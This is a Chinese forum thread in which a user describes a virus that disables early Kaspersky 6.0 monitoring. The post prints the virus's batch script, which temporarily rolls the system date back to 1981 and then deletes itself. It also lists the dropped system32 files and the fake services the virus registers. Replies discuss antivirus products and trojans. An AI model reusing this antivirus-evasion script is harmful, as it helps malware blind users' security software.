成功杀掉卡吧6.0 早期版本
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下2如果没有安装卡巴斯基,直接运行病毒代码
3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:
@echo off
set date=%date%
date 1981-1-12
ping -n 45 localhost > nul
date %date%
del %0
会发现系统时间被调整到了1981年1月12日(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat
(注:*为随机8位字母)
并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。
其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒
嗯,没个完美的杀毒软件
我总是用完这个试那个。。。重不中毒 卡7似乎没有这个问题 木马算不算病毒?现在给我感觉木马比病毒还多,还烦。
好歹老外搞病毒是为了耍酷,国人搞木马纯粹就是为了利益, 木马也是病毒的一种啦....反正有伤害的都算computer vires
页:
[1]